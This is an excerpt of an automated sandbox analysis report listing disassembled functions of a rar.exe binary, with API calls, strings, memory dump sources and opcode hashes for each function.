                                                                                                                                                                      Function 00007FF6EE7958A4 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: gfffffff
                                                                                                                                                                      • API String ID: 3215553584-1523873471
                                                                                                                                                                      • Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                      • Instruction ID: ed66f27e7e678412c60ae7ad0ada4b8097419092b0540c8d45ba6cf61f3d8b56
                                                                                                                                                                      • Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D914563B19B9646EF108F29D1803686B95EF317D0F068131EA8D87391DE7FE122C316
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE76CFCF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF6EE77B6D0: Sleep.KERNEL32(?,?,?,?,00007FF6EE74CBED,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE77B730
                                                                                                                                                                      • new.LIBCMT ref: 00007FF6EE76CFD9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                      • String ID: rar$rev
                                                                                                                                                                      • API String ID: 3472027048-2145959568
                                                                                                                                                                      • Opcode ID: 97d5eeffa8c4d2296c887cd490566290d1f91d5c51c78274d64fe8ea8adf1f36
                                                                                                                                                                      • Instruction ID: ef1a669e128a4ae1f9d27e1d38f33c64e4f2ce93bf13f6b97563184a6fbe63ee
                                                                                                                                                                      • Opcode Fuzzy Hash: 97d5eeffa8c4d2296c887cd490566290d1f91d5c51c78274d64fe8ea8adf1f36
                                                                                                                                                                      • Instruction Fuzzy Hash: 83A1C123A2864382EF14EB20C4543BE6365FB64788F474031EB5D876D5EFAEE564C34A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE78F7CC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: *
                                                                                                                                                                      • API String ID: 3215553584-163128923
                                                                                                                                                                      • Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                      • Instruction ID: 08715bdb157d5d602bce82c5c73f33635dc98bf2cda34356000164f8391ae6f1
                                                                                                                                                                      • Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                      • Instruction Fuzzy Hash: 9C71537390866985EF688F24C04523C37A1FB75F58F261136EA4AC2294DFBAD4A1C71F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE795CD4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                      • API String ID: 3215553584-3030954782
                                                                                                                                                                      • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                      • Instruction ID: cbc8bb4a830eb3057b67eab3ef8b587e10b34a90a7925753e6913bdd3bb0b4bd
                                                                                                                                                                      • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                      • Instruction Fuzzy Hash: DF514B63B28BD246EB258B35D8403697B91EB60B90F0A8231E69CCBBC5DF6FD050C715
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE764534 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF6EE75475B,?,00000000,?,?,00007FF6EE754620,?,00000000,?), ref: 00007FF6EE764633
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                      • String ID: UNC$\\?\
                                                                                                                                                                      • API String ID: 1611563598-253988292
                                                                                                                                                                      • Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                      • Instruction ID: 86cee7fe517054ae39642589992c0dfef6b03da36240141a314a6c6710879f98
                                                                                                                                                                      • Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                      • Instruction Fuzzy Hash: D141CC03A1868340EF606751D4013B963A1BF657C8F438131FD9DC76DAFEADE5A4D60A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE793B0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe
                                                                                                                                                                      • API String ID: 3307058713-4140927169
                                                                                                                                                                      • Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                      • Instruction ID: 6420e24dc9fabf44c4295cdcce30b22f410fd9e9d1b500086217787666b39ee8
                                                                                                                                                                      • Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                      • Instruction Fuzzy Hash: 5A41BD37A08A5295EF14DF29E4802B866A4EF55B84B074031FD0D87B95DFBFE4A1C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE777C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFilewcsstr
                                                                                                                                                                      • String ID: System Volume Information\
                                                                                                                                                                      • API String ID: 1592324571-4227249723
                                                                                                                                                                      • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                      • Instruction ID: e5f5e973b2ef28b6e79d6c7bb3d1d452500397f1bc1470ca6bcee00bff7779e3
                                                                                                                                                                      • Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                      • Instruction Fuzzy Hash: FA312323A1968245FF509B21E1503BA27A4EF65BC1F464030FE8D97796DEBEE061C70A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE744888 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LoadString$fflushswprintf
                                                                                                                                                                      • String ID: %d.%02d$[
                                                                                                                                                                      • API String ID: 1946543793-195111373
                                                                                                                                                                      • Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                      • Instruction ID: 9a7c9ffc114891d8cddeabfa0fcf215faed7dff444e39199512e5bc5bf003a99
                                                                                                                                                                      • Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E31C413A095C651FF60EB14E0053B92391EF64744F46003AF64D876C6EFBEE4A6CB0A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE773C20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: snprintf
                                                                                                                                                                      • String ID: $%s$@%s
                                                                                                                                                                      • API String ID: 4288800496-834177443
                                                                                                                                                                      • Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                      • Instruction ID: 714182730347ff8aeb3dda19f24575860b2b387bcd96d1f433a78b8dae35e0d5
                                                                                                                                                                      • Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                      • Instruction Fuzzy Hash: 9131CB23A18A82A5EF108B55E4407BA2360FB64788F420032FE4D97BD9DE7EE535C709
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE76F474 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                      • String ID: fixed%u.$fixed.
                                                                                                                                                                      • API String ID: 233258989-2525383582
                                                                                                                                                                      • Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                      • Instruction ID: a699df3e983df6946d93ca39975805492527ee5c7e522a1da1893645a64df80e
                                                                                                                                                                      • Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                      • Instruction Fuzzy Hash: A031E623A1C68252FF10DF25E4003E97360FB64384F910132FA8D87A9ADE7ED556CB05
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7749F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LoadString
                                                                                                                                                                      • String ID: Adding %-58s
                                                                                                                                                                      • API String ID: 2948472770-2059140559
